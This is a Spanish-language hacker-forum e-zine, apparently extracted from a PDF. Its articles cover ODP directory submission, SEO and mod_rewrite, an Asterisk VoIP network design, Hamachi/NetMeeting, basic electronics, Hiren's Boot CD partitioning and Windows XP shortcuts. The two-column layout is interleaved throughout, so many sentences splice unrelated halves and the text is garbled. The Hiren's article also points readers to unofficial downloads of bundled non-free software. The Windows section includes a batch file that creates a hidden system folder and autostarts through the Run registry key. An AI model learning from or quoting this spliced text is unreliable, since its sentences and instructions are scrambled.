persistente nos obligarán a excluirle de dmoz, así podremos que no se trate por igual a todos los envíos. Puede que no
ofrecer los recursos a personas reales. coincida siempre con nuestras decisiones, pero esperamos
Un editor de ODP revisará su envío para determinar si se que se dé cuenta de que hacemos todo lo que podemos para
incluirá en el directorio. En función de distintos factores como tomar decisiones justas y razonables.
el volumen de envíos a una categoría en particular, puede El equipo del Open Directory agradece comentarios y
llevar hasta varias semanas o más antes de que su envío sea observaciones sobre el directorio en general. Por favor
revisado. Por favor envíe cada URL al Open Directory una muéstrenos su opinión y cómo podemos mejorar el servicio.
sola vez. Le repetimos que el envío reiterado del mismo o de Muchas gracias.
sitios relacionados puede conllevar la exclusión y/o Vaya a la página inicial del Open Directory en dmoz.org -
eliminación de ésos y todos los sitios afiliados. Disfrazar su comience aquí la búsqueda de la categoría a la que realizar
envío y sugerir la misma URL más de una vez no está su envío.
permitido.
¿Cuánto tiempo tarda mi sitio en ser listado?
Actualizar su sitio Dependiendo del nivel de actividad de los editores en su
Si un sitio ha sido aceptado en el directorio pero no está área, pueden pasar dos semanas o más hasta que su sitio
satisfecho con la descripción o el título del sitio, puede ir a la sea revisado. Aunque el ámbito y la cobertura del directorio
categoría donde está listado y rellenar el formulario sean tan extensos, tenemos muy en cuenta la calidad de ODP
"actualizar URL". Si no está satisfecho con la categoría y estamos orgullosos de ser muy selectivos. No aceptamos
donde su sitio está listado, puede enviar un email a un editor todos los sitios, por lo tanto, si el suyo no es aceptado, por
de la categoría explicando su desacuerdo. Sea civilizado y favor no se lo tome como algo personal. Nuestra meta es
educado, los comportamientos amenazadores u ofensivos no hacer un directorio tan útil como sea posible para nuestros
serán tolerados. usuarios, no servir como herramienta promocional para las
CUH e-zine vol #1 - 1ª edicion Posicionamiento Web

entidades listadas ni incluir en el directorio todas, ni siquiera se necesita base de datos recupera la información
la mayoría de las páginas que posiblemente podrían ser dependiendo ( en realidad las web no están hasta q alguien
listadas. las visita ) la creación de paginas es mas fácil rápido tiene
mas recursos que puedes lograr
¿Tiene el ODP un servicio urgente que permita que mi página
sea listada en menos tiempo? ¿Cual de las dos es mejor?
El ODP no tiene un servicio urgente similar a otros directorios La estática según he leído se indexa mejor que la dinámica
comerciales, sin embargo, hay varias cosas que puede hacer por que a google no le gustan los parámetros o 'sessID' o
para ayudar a que la revisión de su solicitud sea rápida. 'sessionID' ejemplo web.php?parametro5=7&parametro2
Primero, siga cuidadosamente las normas de envío. los ? = & no le gustan y no te indexara y si lo llegara a
Segundo, debería revisar algunas de las políticas editoriales indexar no te posicionara por q al buscar
que usamos para listar los sitios. Una solicitud bien escrita y google se basa en url, titulo , contenido y link q apuntan
meditada tiene más posibilidades de ser revisada antes que hacia tu web (las metas actualmente no son necesarias pero
una descuidada. no esta de mas ponerlas bien)

Sin embargo, no recomendamos sugerir un sitio en varias ¿Dinamica es la mejor pero si no te indexa que se puede
categorías distintas con la esperanza de que acabe siendo hacer ?
listada en una o dos de ellas. Con esto, no conseguirá que path info o mod_rewrite en realidad son parecidas pero el
Web sea listada antes, de hecho puede retrasar mod_rewrite es mas flexible
significativamente el proceso. Esto puede ser interpretado
como spam y que al final su sitio no sea listado. mod_rewrite
¿Cómo consigo que listen mi sitio en más de una categoría? para su uso necesitas servidor Apache con el módulo
Debería sugerir su sitio a una única categoría, la que mod_rewrite activado y permitido el uso de .htaccess
considere más apropiada con sus contenidos. Por favor,
sugiera su página una sola vez. Los editores de ODP se ejemplo tenemos
reservan el derecho de determinar en qué categoría o http://tuweb.com/tipo=buscadores&google=googlebot
categorías será colocado su sitio utilizando su criterio seria
editorial. http://tuweb.com/buscadores/google/googlebot.html
¿Cuánto tiempo tarda en aparecer mi sitio en los motores de
búsqueda que usan los datos de ODP como AOL Search y en próximos se hará mas extenso este tema de mod_rewrite
Netscape Search?
Una vez que su sitio ha sido listado en ODP, puede tardar Sitemaps
dos semanas o más en aparecer en los motores de búsqueda Un buen sitemaps es siempre muy bueno tenerlo ya que con
que utilizan los datos de ODP. Es responsabilidad de esos esta herramienta google te indexa mas rápido tu contenido
buscadores utilizar la última versión de nuestros datos. ODP fresco
no tiene ningún control sobre cuándo terceras partes http://www.google.com/webmasters/sitemaps/?hl=es
actualizan los datos provenientes de ODP.
¿A quién le pido ayuda sobre mi sitio y sobre la categoría Page rank y conseguir quien te enlace
más apropiada para que sea listado?
Si después de explorar el enorme árbol de categorías, Esta creado por los fundadores google es un valor numérico
todavía no está seguro de dónde debería enviar su sitio, la que va de 0 a 10
mejor opción es sugerirlo en la categoría que piense que conforme mas pagerank mas difícil es subirlo
mejor refleja sus contenidos. Los editores tienen la capacidad cuando alguien te linkea de la forma adecuada es como dar
de mover su sitio a otra categoría diferente o de crear una votos hacia tu Web.
nueva si hiciera falta. pero es mejor que no te linke aquellas webs que están
¿Qué debería hacer si la categoría a la que quiero enviar mi penalizadas por google (baneadas)
página no tiene un enlace "Agregar URL"? eso te perjudica también alguna q contenga demasiados
Unas pocas categorías tienen deshabilitado el enlace enlaces hacia a otras webs
"Agregar URL" y no aceptan envíos ni listan sitios. Debería el pagerank lo puedes ver bajándote la barra google y en
encontrar otra más específica explorando las subcategorías. algunos sitios
y como deberían ser los links a continuación
Url amigables
Esto va enfocado a sitios dinámicos Manejo correcto de los links
¿Que es un Web dinámica y una estática? La mejor forma de poner los links es link de texto
ejemplo
-Web estática
<Ahref=http://www.webom/quiero-a-google.html>
muestra el mismo contenido siempre, para agregar contenido
quiero a google</A>
se tiene que modificar la Web a veces por completo aunque
seguramente le has dado en cache a busqueda en google
con el CSS se pueden hacer grandes logros
algunas veces solo aparece solo se encontraron términos q
apuntan hacia esta pagina
-Web dinámica
son creadas según al que te visita en la mayoría de los casos
Herramientas google
CUH e-zine vol #1 - 1ª edicion Posicionamiento Web

El mismo google te da herramientas para lograr una buena


indexación

Asistente informativo sobre el estado del sitio


Descubra si su sitio forma parte ya del índice de Google.

Blog de Google destinado a webmasters (inglés)


Las últimas novedades y las noticias más recientes
relacionadas con los sistemas de rastreo e indexación de
sitios web utilizados por Google.

Herramientas para webmasters (incluido Sitemaps)


Estadísticas, diagnósticos y administración de los procesos de
rastreo e indexación que realiza Google de su sitio web,
incluidas funciones como el envío de Sitemaps y la
generación de informes.

Foro de debate de Google para webmasters


Entable conversación con otros webmasters y comparta sus
ideas con nosotros.

Envíe contenido a Google


Descubra los métodos para enviar contenido a distintos
servicios de Google, como Google Base y Google Libros.

Centro de Asistencia para webmasters


Consulte las respuestas a las preguntas más frecuentes
formuladas acerca del rastreo, la indexación, la clasificación
y otros muchos temas.

todo ello aquí


http://www.google.com.mx/intl/es/webmasters/

mas capítulos posteriormente como robots.txt cuanto es lo


máximo que debe pesar tu Web que no contenga errores
como te puede penalizar y mas …
By XD (DJChileOut)

Servicios Google
CUH e-zine vol #1 - 1ª edición vozIP para empresas

Diseño para implementar VozIP en una Empresa by juca

Contenido: La petición de llamadas de los usuarios esta descrita en el


gráfico y la hora máxima de actividad, misma que es a las
cuatro de la tarde de igual manera se hizo un promedio 12
1.- Introducción
personas hablando en un promedio de 6 minutos (Esto es
2.- Requerimientos
entre Quito – Guayaquil)
3.- Recursos
Red Wan Quito - Guayaquil
4.- Cálculo del Tráfico
5.- Diseño y calculo

3.- Recursos
1.- Introducción

Tipo de Recursos
En vista del aumento de la demanda por implementar una
red con VozIP es importante saber los elementos necesarios
El tipo de recurso va a ser el 30% circuitos y el 70%
para poder realizarla.
paquetes.
Así como también tomar en cuenta todos los cálculos que
La empresa cuenta con cableado estructurado.
son necesarios para ponerla a funcionar de una manera
correcta y que asegure una excelente comunicación.
Ingeniería de Tráfico
Lo planteado aquí es una solución real que se ejecutó y que
utiliza un enlace WAN entre 2 ciudades grandes dentro de
El método para desarrollar esta infraestructura de telefonía
Ecuador (Quito - Guayaquil).
IP será ASTERISK con un servidor GNU/Linux, con switch
FXS – FXO.
2.- Requerimientos Base de Datos MySQL

La petición de llamadas de los usuarios esta descrita en el Se utilizarán teléfonos IP y Softphone


gráfico y la hora máxima de actividad, a las tres de la Asterisk ofrece los siguientes servicios:
tarde tenemos 200 personas llamando esto es en las horas
pico y con un promedio de duración de las llamadas de 6 Transferencia Ciega
minutos. Pickup de Llamada
Buzón de Voz
Red Lan Dentro del Mismo Edificio Caller ID
Música en espera
Llamada en Espera
Colas de llamada
Timbres Distintos
Conferencias

Líneas digitales E1.


El protocolo de comunicación será el SIP, esto será tanto en
Quito como en Guayaquil
Audio Codec será g.729 de 8 kbps
CUH e-zine vol #1 - 1ª edición vozIP para empresas

Se desea tener una buena calidad de servicio lo cual sin


brinda ASTERISK.
El grado de servicio será 1%.

Grado de Servicio

El grado de servicio es 1%

Número de Extensiones analógicas y digitales

El número de extensiones analógicas serán 90


El número de extensiones digitales serán 210

4.- Cálculo del Tráfico Teléfonos IPs

Red LAN Necesitaremos 17 teléfonos IP


A = λ * tm
A= (200*6)/60 = 20 Erlang

Red WAN
A = λ * tm
A= (12*6)/60 = 1,2 Erlang

Hora Pico

En la red LAN es a las 15:00 horas se producen 200


Necesitaremos 193 softphones
llamadas con un promedio de 6 minutos.

En la red WAN es a las 16:00 horas se producen 12


llamadas con un promedio de 6 minutos.

90 teléfonos analógicos
CUH e-zine vol #1 - 1ª edición vozIP para empresas

5.- Diseño y calculo

Para hacer el calculo de las troncales se hace con la ayuda


de la calculadora ErlangB además que ya se tiene el
calculo de los erlang que es 20

El ancho de Banda que ocupara en horas pico será de


283.5 Kbps, esto es entrante y la saliente tiene el mismo
valor, lo da un total de banda para ocupara de 567 Kbps.

Por lo tanto el canal para contratar entre Quito - Guayaquil


será de 1024 Kbps.

Trafico será 20 Erlang

El número de circuitos será 30 en este caso se contratará un


E1**

GOS 1%

** E1 en velocidad equivalente a 2048 Mbps


** E1 Permite 30 canales como máximo.

El ancho de banda que se requiere para integrarse a la red


WAN. Más Información:
http://www.asteriskguru.com
De igual manera para el ancho de banda se utilizo una
calculadora llamada Bandwidth Calculator. http://www.asteriskguru.com/tools/bandwidth_calculator.php

http://es.wikipedia.org/wiki/Asterisk

http://www.digium.com/en/index.php

Manual realizado por JUCA


CUH e-zine vol #1 - 1ª edición Conectar 2 PCs

Conectar 2 PCs con NetMeeting y Hamachi by Logan_Doax

Antes que nada este tutorial sirve para los que tengan
Windows xp

Bueno este tutorial es un aporte 50% mío (Logan_Doax)


y 50% de alfai; el proposito es que se puedan conectar
2 computadoras mediante el NetMeeting, un programa
que permite compartir y enviar archivos o el mismo
escritorio entre dos pc´s en red. Pero el primer
inconveniente seria que, algunos cuentan con un modem
de alta velocidad y/o un router, este pues cambia la
dirección ip de una computadora y seria imposible
conectarse a una con un router.
Para eso utilizaremos un programa que se llama
hamachi. Un programa que simula una red.
DescargaÆ http://www.hamachi.cc/download

Una ves que lo hagamos descargado lo instalamos, esto


es muy fácil.
Ojo: si te pide si deseas instalar en modo Premium tu
dale que no, mejor selecciona la casilla que dice que es En mi caso, ya tengo redes unidas a mi hamachi; ustedes
free; esto para evitar futuros problemas. no se preocupen pueden agregar las que ustedes
quieran.
Ya instalado lo ejecutamos: De hay presionamos el botón de en medio:

Los más probable es que, como seria la primera vez que


lo ejecutas te pedirá crear una red o un usuario para
identificarte, hazlo y cuando termines pasas al siguiente
paso.

Nos aparecerá una minipantalla como esta:

Como se señala, le damos clic al botón de power.

Cargara unas cuantas cosas (3 en total). Y después les


aparecerá algo así:

Y de hay a Crear nueva red ...


Les aparecerá un recuadro como este:
CUH e-zine vol #1 - 1ª edición Conectar 2 PCs

Crear la red es tan fácil y sencillo que solo basta con


ponerle un nombre a la red y darle una contraseña. Pues
la creas XD …

Y después aparecerás en la ventana principal del


hamachi.

Ojo: ese numero que comienza con 5, es tu ip de


hamachi, recuerda esto. Bueno de vuelta al hamachi; una ves que tú y el amigo o
persona a la que te vallas a conectar haigan instalado
el hamachi.

Uno de los dos se una a la red creada por uno de


ustedes; por ejemplo tu te unes a su red o el a ti. (El que
se valla a conectar debe seguir el siguiente paso; en este
Bueno ahora queda configurar el NetMeeting: caso tu te conectaras a el).

Vamos a inicio / ejecutar y escribimos conf


Solo dale de nuevo al botón de en medio del hamachi,
pero esta ves le das a unirse a la red.

Si aparece un asistente le damos a siguiente, hasta que


aparezca un cuadro que pide
El nombre, dirección, e-mail, etc. Si quieres puedes poner Hay solo escribes el nombre de su red y la contraseña,
datos falsos y tu correo seria lo único verdadero. XD después le das click a unirse,
Y ya estarás en su red.
Después de terminar el asistente te aparecerá la ventana
del NetMeeting Ahora al NetMeeting y te vas al siguiente campo:
CUH e-zine vol #1 - 1ª edición Conectar 2 PCs

Una vez conectados pueden utilizar los botones que


vienen en la ventana del NetMeeting para:

(Les diré la acción de izquierda a derecha)

Compartir programa:

Esta función nos sirve para compartir programas en


Hay ingresaras el numero ip de tu amigo se lo pides o te ejecución y hasta el mismo escritorio.
fijas en el hamachi (su ip esta al lado de su nombre de
usuario o red). Ejemplo:

Y le das clic al botón de llamar.

IMPORTANTE: tu amigo debe tener abierto el


NetMeeting para que reciba la llamada.

En este caso esta deshabilitado todo porque no estoy


Una ves que tu amigo reciba la llamada le da a aceptar conectado a nadie. XD
y estarán conectados.
Ejemplo: Conversación: su nombre lo dice puede iniciar un Chat
entre ambos usuarios. XD
CUH e-zine vol #1 - 1ª edición Conectar 2 PCs

Pizarra: abre una ventana de paint a ambos usuarios


para que puedan compartir y dibujar en

.
una “pizarra” al mismo tiempo, los cambios que se
hagan se verán en tiempo real
Transferir Archivos: su nombre lo dice sirve para enviar
archivos entre ambos usuarios.Una vez
que se quieran desconectar solo dale clic al botón
colgar:

Y listo. También pueden intentarlo con otros S.O. aparte


de Windows, pero el programa a utilizar para conectarse
ya no seria el NetMeeting. Pero si

se usaría el hamachi debido que se puede descargar


para linux, Mac, etc

• Para la CUH E-zine Foro el-hacker.com


.

Utensilios y dispositivos para la instalación física de


redes :

Conector RJ45 Ponchadora Cable UTP Tarjeta Modem


CUH e-zine vol #1 - 1ª edición Introducción a la electrónica

Introducción a la electrónica By Elektro


Bienvenidos , mi nombre es elektro y es mi misión guiarlos Corriente eléctrica.
durante este viaje. De mi solo puedo decirles que he Electrones libres.
dedicado buena parte de mi tiempo al estudio tanto formal
como informal de la electrónica y que la robótica es para Que pasa si un electrón escapa de su orbita?
todo aquel que ama la tecnológica, un fascinante paso más.
Debido a la excitación térmica normal que todos los
Me tomo bastante tiempo decidir como debía comenzar esta materiales tienen o al calor externo, algunos electrones de la
sección, y tal vez debido a mis tiempos académicos no puedo última orbita del átomo absorben una fracción de energía y
evitar pensar que es necesaria una mínima introducción a la gracias a ella vencen la fuerza gravitatoria que los mantiene
electrónica. Si, seguro que muchos que están leyendo esto ya en orbita al núcleo lo que les permite liberarse. Ellos
saben que es un electrón y cuales son los efectos que permanecen libres sólo una fracción de segundo, pero en
produce su movimiento a través de los diferentes materiales, todo momento son billones de ellos los que se encuentran
pero seguro que también hay mucha gente que no y prefiero libres en el espacio inter-atómico en una sustancia particular.
dejar esta información básica planteada ahora, para que Si estos electrones se mueven en una misma dirección,
después sirva como referencia y siempre la tengamos a tenemos lo que se conoce como flujo de corriente o corriente
mano. eléctrica. Para lograr que este movimiento de electrones se
dé en un sentido o dirección, es necesario una fuente de
Bueno, empecemos por el principio..... energía externa (Ej. Batería), siendo que las cargas iguales se
repelen y las diferentes se atraen, los electrones escaparan
Nuestro amigo el átomo: del borne negativo (-) de la batería para llegar el positivo (+)
de la misma.

La cantidad de corriente eléctrica que circula por un


Esta representación sigue el modelo atómico de Bohr, el cual conductor se denomina intensidad de corriente, se representa
fue una mejora de modelos anteriores planteados por otros con la letra I, y nos indica la cantidad electrones que pasan
científicos. por un punto en una determinada fracción de tiempo. La
unidad de medida es el Amperio (A).
No vamos a entrar en mucha profundidad, solo vamos a decir Esta unidad es equivalente a un Coulomb / Segundo, el
que el átomo que vemos en el dibujo esta compuesto por un Coulomb es una unidad de carga eléctrica y equivale a
núcleo en el cual se encuentran los protones y neutrones (de 6.241 509 629 152 65×1018 electrones (muchos no?) .
cargas eléctricas positiva y neutra respectivamente) y en el
exterior, orbitando este núcleo están los electrones (carga Llegamos al momento de tener que decir, que si bien la
eléctrica negativa). corriente es el resultado del movimiento de los electrones,
por convención la corriente en un circuito se toma en sentido
En estado de equilibrio los electrones igualan en numero a contrario. Se considera entonces que la corriente circula
los protones. desde el borne positivo al negativo, cuando en realidad los
electrones están circulando desde el borne negativo al
positivo.
CUH e-zine vol #1 - 1ª edicion Introducción a la electrónica

Materiales conductores y no conductores resistencia y medir la corriente y la tensión de la misma para


Algunos materiales tienen muchos más electrones libres que diferentes valores de resistencia.
otros, esto es debido a que sus electrones están ligados más
débilmente al núcleo, por lo tanto permiten que se establezca Bueno, para cerrar esta quizás “tediosa” parte teórica creo
una corriente eléctrica a través de ellos . Estos materiales oportuno comentarles otra ley, que en la electrónica de estos
reciben el nombre de conductores. Los principales materiales días la sentimos constantemente, y es la:
conductores son: el oro, la plata, el cobre y los metales en
general. Ley de Joule
Los materiales que tienen pocos electrones libres no permiten
el flujo de electrones a través de ellos y reciben el nombre de P = I² * R
materiales no conductores o aislantes, los mejores son: el  
vidrio, la porcelana, la mica, los materiales plásticos, etc.
Los elementos que se encuentran en la situación intermedia  
entre los conductores y los no conductores son los  
denominados semiconductores el más conocido e importante
es el silicio, y los mismos nos permite fabricar diodos,  
transistores, circuitos integrados, etc.
 
Como dato el aire y el agua son aislantes también.... Si, el
agua, pero CUIDADO, solo el agua pura desde el punto de  
vista químico (H2O), en cuanto el agua tiene sales y demás
elementos (el agua corriente que tomamos los tiene) se Esta ley nos da el porque de una resistencia, o cualquier
convierte en un conductor. aparato eléctrico, que en definitiva puede representarse en
parte como una resistencia, levanta temperatura, obvio que es
mucho más complejo que esto, pero esta ley rige la
Tensión, corriente y resistencia eléctrica:
transformación de energía eléctrica en calor, siendo P la
Mucha, pero mucha gente confunde los conceptos de tensión
potencia calórico en Watts.
y corriente eléctrica, y es lo mas normal realizar una
comparación con el modelo hidráulico, que es mucho mas
Bueno, por esta entrega creo que es suficiente, en las
visible y nos permite, a partir de el, comprender su
próximas ya pondremos manos a la obra y veremos cosas
equivalente eléctrico. 
más interesantes, circuitos, componentes y demás. Esta base
Veamos, tenemos un tanque de agua con su nivel a una altura era necesaria ya que sin ella no podemos hablar el mismo
h, un caudal q que baja por la cañería y una resistencia “idioma”.
aportada por un grifo semi cerrado que denominaremos r.
Cuanto mayor sea la altura h, mayor será la presión de agua Hasta Pronto
y por lo tanto mayor será el caudal. Por otra parte si cierro Mas información al respecto:
aun mas el grifo, el caudal a la salida del sistema se http://csep10.phys.utk.edu/astr162/lect/light/bohr.html
reducirá. Si entienden esto bien, entonces solo tenemos que El modelo atomico de Bohr
cambiar los nombres para pasar al caso eléctrico. http://newton.cnice.mecd.es/3eso/electricidad3E/similhi
draulico.htm
La altura es el potencial eléctrico o tensión, el caudal es
El equivalente hidraulico (animacion Java) By
equivalente la corriente y la resistencia que opone el grifo al
Elektro
paso del agua se puede considerar análoga a una resistencia Robot --> Una máquina que puede decirse tiene la capacidad
eléctrica (como la que tiene la plancha dentro) de "sentir" y reaccionar y efectuar tareas complejas, actuando
de cierta manera (inteligencia artificial) , segun las circuntstacias
Entonces, pensando ahora todo en términos eléctricos, saca deducciones y toma desiciones , ejecutando labores
tenemos que la corriente es directamente proporcional a la especilizadas y mecanicnizadas, idealmente sin la supervision
tensión (si aumenta uno aumenta el otro y viceversa) e de humanos. Aunque actualmente se diseñan robots que intetan
inversamente proporcional a la resistencia (a mayor imitar los movimientos humanos para realizar trabajos altamente
resistencia, menor corriente). complejos y de maximo detalle y perfeccion, ellos raramente son
parecidos a nuestra apariencia. Normalmente se usan los robots
De aquí se desprende la ley mas básica y fundamental de la en la produccion de automóviles y computadoras en linea.
electricidad: Robótica . Rama de la ingeniería que tiene por objeto diseñar,
programar y construir robots. lo s Robóticos trabajan dentro de
una gama amplia de ramas ya sea científica abarcando aéreas
La ley de Ohm
como son: la ingeniería electrónica y la ingeniería mecánica,
I=E/R cibernética, biónica, e inteligencia artificial, buscando la finalidad
de dotar las nuevas generaciones de robots capaces tanto de
Siendo E diferencia de potencial (tensión). Como comentario aprender, mayor capacidad sensorial, y por que no decir mejor
es bueno saber que esta es una ley “empírica” es decir que se destreza física, sin dejar atras que tambien se busca
obtuvo de manera experimental, que para este caso consiste independencia, y flexibilidad
simplemente en armar un circuito con una pila, una . Nota Editorial
CUH e-zine vol #1 - 1ª edición Uso del hiren´s boot - Partición de discos

Particionado y disco duro by |_ocutus


Tal vez cuando lean esto ya este x otra versión o el link
este roto, para bajarlo buscar en google o en cualquier
Hiren's boot CD p2p ya q no hay pagina fija d donde bajarlo debido a
restricciones d licencias y todas esas cosas ya q
obviamente mucho del soft incluido no es free.
Hiren’s Boot CD es un cd d booteo q contiene varios
programas d diagnostico como agentes d particionamiento Creación del CD
y clonado d discos, medición d performance del sistema,
recuperación d información, herramientas para MBR,
herramientas para BIOS y muchas otras para reparar 1 vez q tengamos el archivo rar procedemos a
diversos problemas d pc. El mismo es 1 CD booteable, x lo descomprimirlo y nos encontramos, además d algunos txt,
tanto es útil aun si el so no c puede inicializar. Posee con 1 archivo con extensión ISO q es la imagen del Hiren’s.
utilidades d similar funcionalidad agrupadas en los Además d 1 dir (keyboard patch) q sirve para cambiar la
submenús y a pesar d q algunas hacen el mismo trabajo configuración del teclado q x default viene en ingles.
nos dan posibilidades para elegir entre distintas interfaces Al q no le interese la conf d teclado puede quemar el ISO
d usuario. directamente con Nero.
Para cambiar la configuración copiar en 1 mismo
directorio el contenido d “keyboard patch” y la imagen
ISO, ejecutar “Patch.bat” y seleccionar desde ahí el tipo d
teclado. Una vez listo quemar la imagen con Nero o el
programa q les guste.

Uso del CD
Para poder bootear con el hirens lo 1ero es tener la unidad
d CD como 1er dispositivo d booteo. Esto lo cambiamos
desde el setup d la pc, x lo gral lo encontramos en 1 menú
llamado “Boot Device Priority” o algo parecido. Tendría q
quedar algo así:

El Hiren’s debería ser 1 herramienta indispensable para


cualquier técnico o persona q pretenda reparar 1 pc,
desde 1 simple particionamiento hasta recuperar sectores
defectuosos en 1 hd pasando x cosas tan variadas como
borrado y/o recuperación d passwords tanto d sistema
como d BIOS, soporte USB y SATA, posibilidad d levantar 1 Guardar cambios, reiniciar y al bootear con Hiren’s nos
red fácilmente... todo en la + pura consola d dos. Todos los sale 1 menu como este
progs contenidos en el CD también tienen su versión x
separado, pero la ventaja d este disco es justamente no
tener q depender d nada para poder usarlas, solamente 1
lectora y booteo desde el CD (también c puede hacer en
versión USB), cosas q cualquier pc tiene hoy en dia.

Pueden ver la lista d progs contenidos en el mismo desde


acá:

http://www.hiren.info/pages/bootcd

La ultima versión a la fecha es la 9.1 q puede ser


descargada desde aca: :
http://rapidshare.com/files/34106649/hiren_bootcd_9.1_en
.rar desde ahí podemos elegir entre iniciar el Hiren’s (Start
BootCD) o seguir con el booteo normal del S.O. (Boot
CUH e-zine vol #1 - 1ª edición Uso del hiren´s boot - Partición de discos

From Hard Drive). Al entrar a la opción d Hiren’s nos


encontramos con este menú: Como no creo q a nadie le interese el disco físico mucho +
allá d esto vamos al sentido + practico d las cosas...

El disco tal como lo compramos no puede ser reconocido x


formatearla con algún sistema d archivos q sea reconocido
x nuestro S.O., esto es lo q c llama la “estructura logica”
del disco.

La misma esta formada x el MBR (Master Boot Record o


Sector d Arranque) y luego las particiones y el espacio sin
seguido x este después d presionar “next”: particionar si es q hay alguno. El MBR esta ubicado en el
sector 0 del disco y contiene la tabla d particiones además
d 1 programa q lee la misma y delega el control al sector d
arranque d la partición activa, si no hay ninguna muestra 1
mensaje d error.

Tenemos varios tipos d particiones, la + común es la


primaria q es la q c usa normalmente para instalar 1 S.O.
Después tenemos particiones extendidas q c usan como
contenedor para las unidades lógicas.

en este punto ya estamos listos para ejecutar cualquiera d


las aplicaciones prácticamente, solo tenemos q elegir q es
lo q queremos según el problema.

Particionamiento de discos
En el grafico vemos 1 estructura d disco donde comienza
Los discos rígidos (también llamados “duros”) datan del con el MBR en el arranque, sigue con 1 partición primaria
año 1955, cuando fueron presentados con el IBM 305. A típica y después tiene 1 partición extendida q contiene 2
través del tiempo cambiaron bastante hasta llegar a lo q unidades lógicas seguido x 1 espacio sin particionar. En
son hoy en día. este caso veríamos 3 unidades d disco en nuestro sistema
Actualmente el disco esta formado físicamente x 1 grupo d suponiendo q todas tuvieran formato.
platos concéntricos q giran a la vez a velocidad constante
desde q c enciende la pc, cada uno d ellos tiene 2 Con esta base vamos a ver como podemos formatear y
superficies magnéticas, la superior y la inferior. hasta alterar particiones con el Hiren’s.
Estos platos tienen 1 grupo d brazos alineados en la punta
d los cuales están los cabezales d lectura/escritura, estos
brazos pueden moverse hacia adentro y afuera para poder Partition Magic Pro v8.5
recorrer toda la superficie del disco. Desde el menu principal del hirens vamos a:
1.Disk Partition Tools...
y despues a:
1.Partition Magic Pro v8.5

Vamos a crear las mismas particiones del grafico d arriba


en 1 disco d 2 Gb. Empezamos con el disco vacio sin
partición ni formato alguno.

Lo 1ero es crear una partición primaria d digamos...


500mb, entonces vamos a “Operations” y d ahí a “Create”,
Las 2 caras del plato son utilizables, x lo tanto cada brazo
con esto c despliega el menú d creación d particiones al
es doble y tiene 1 cabezal para la parte superior del mismo
cual le tenemos q hacer algunos cambios. Vamos a hacer d
y 1 para la inferior. Los cabezales jamás tocan la superficie
cuenta q vamos a instalar 1 sistema XP... a una en 500mb va
ya q la rayarían inmediatamente y c dañaría.
CUH e-zine vol #1 - 1ª edición Uso del hiren´s boot - Partición de discos

a estar difícil... xD

Create as cambiamos “Logical Partition” x “Primary


partition”
Partition Type NTFS
Size 500Mb
Cluster Size lo dejamos en “Default”
NTFS Version 3.1 (Windows XP)

tiene sectores rotos en el medio, la mejor solución es crear


particiones alrededor d los mismos para evitar dichos
sectores.

con esto ya tenemos la primaria, siguiendo el mismo


procedimiento creamos las otras 2 como lógicas
asignándoles tambien 500mb a c/u, para poder hacerlo hay
q hacer click en “Unallocated” en la pantalla principal, o
sea en el espacio sin usar. Todos los cambios q hacemos los
vamos viendo en la parte superior en forma grafica y en la
inferior en modo texto. Con las otras 2 particiones quedaria
asi:

Otra opción muy interesante es la de Resize/Move, q nos


permite cambiar el tamaño d 1 partición o moverla
(siempre q sea posible) d manera muy fácil

.Con esto ya pueden particionar tranquilamente y hacer


unas cuantas cosas +... solo es cuestion d agarrar algun
disco viejo y ponerse a experimentar. El Partition Magic es
el + facil d usar pero sabiendo ya la teoria tienen otras
utilidades para particionar + avanzadas y con +
posibilidades dentro del mismo Hiren’s. Cuando el Partition
no tenga secretos empiecen con las otras a ver q les
parece.
En los próximos numeros (si todo sale bien y los hay.. :P)
vamos a seguir viendo las utilidades del Hiren’s... No
Ahí tendríamos la misma estructura q la del grafico salvo x rompan muchos hds!!! xDD
el MBR q no c puede ver. Nótese también q al crear la
partición en el mismo menú d creación q veíamos sobre la
parte superior derecha tenemos la opción d comenzar la |_ocutus
partición al comienzo o al fin del espacio vacio... con lo q
podríamos dejar la parte sin particionar en medio del
disco. Para q servirá esto? dirán... imagínense q el disco
CUH e-zine vol #1 - 1ª edición Varios trucos WIndows

Trucos varios de Windows XP Editorial


Este articulo se trata de una serie de truquitos para el Print screen: Tecla que hace una captura todo lo que
sistema operativo Windows, los cuales que uno aprende haya actualmente en la pantalla
casi todos los días por ahí.
Alt + Print screen: Hace una captura solamente de la
ventana actual

PC sin mouse? F1: Tecla de utilizad para la ayuda de Windows, y de


A cuantos no nos ha pasado que el casi todas las aplicaciones.
mouse deje de funcionar, y pues si no sabemos unas
cositas, no podemos hacer nada, la tecla mas importante Ctrl + Alt + Supr: En la pantalla de inicio, si lo oprimimos
para empezar es la tecla Windows Æ Tecla Win dos veces nos abre la cuenta de administrador, en el
identificada en casi todos los teclados por el popular logo Windows normalmente llama al administrador de tareas.
de las ventanitas.
Ya saben si se les daña el mouse, don´t fear.
Aquí no explico los métodos, solamente hago mención a
Como crear una Unidad virtual
las teclas que nos ayudaran a movernos y trabajar, casi
Esto es algo que es muy sencillo y también muy útil,
que común y corriente
además de ser muy fácil, voy a poner el código del
Tecla Win o Windows: Ejecuta el menú inicio, además archivo bat que crearemos para hacerlo y la explicación
servir de combinación junto con otras teclas para los línea a línea
atajos de teclado del Windows.
Virtualdrive.bat
Cd\ Æ Nos ubicamos en el directorio Raiz
Tab : En el explorador de archivos, nos mueve por la
barra de direcciones y por el panel lateral, también puede
Md Hacking ÆCreamos la carpeta hacking
ser usada en otras ventanas.
Attrib +h +r +s c:\hacking Æ Ponemos atributos
Alt + F4 : Cierra la ventana actual.
especiales a la carpeta hacking
Flechas de desplazamiento: Nos ayudan a movernos por
Subst Z: c:\hacking Æ Creamos la Unidad virtual
los distintas interfaces.
Luego modificamos esta clave:
Alt : Si la oprimimos sola, activa la barra de menús,
acompañada de la primer letra de cada menú lo abrirá HKEY_CURRENT_USER\software\microsoft\windows
indefectiblemente \CurrentVersion\run Æ valor alfanumérico con el
nombre del programa (en este caso Virtualdrive.bat)
Esc : Anula cualquier acción o evento indeseable, no como valor y la ruta donde hemos alojado el programa
cierra ventanas ni nada por el estilo. como la información del valor. Esto hara que cada vez
que iniciemos, se ejecute el bat, y por ende tener siempre
Win + L: Nos manda a la pantalla de bienvenida, disponible nuestra unidad virtual.
evitando, así ser husmeados o que se yo!

Win + R : Abre la ventana Ejecutar.

Win + U: Abre el Administrador de Utilidades

Win + E: Ejecuta el explorador de archivos

Win + F: Abre el buscador de Windows

Win + C : Muestra el dialogo de la conexión.

Alt +92 : Muestra el importante carácter ”\”

Alt + 126: Muestra el carácter “~” otro importante


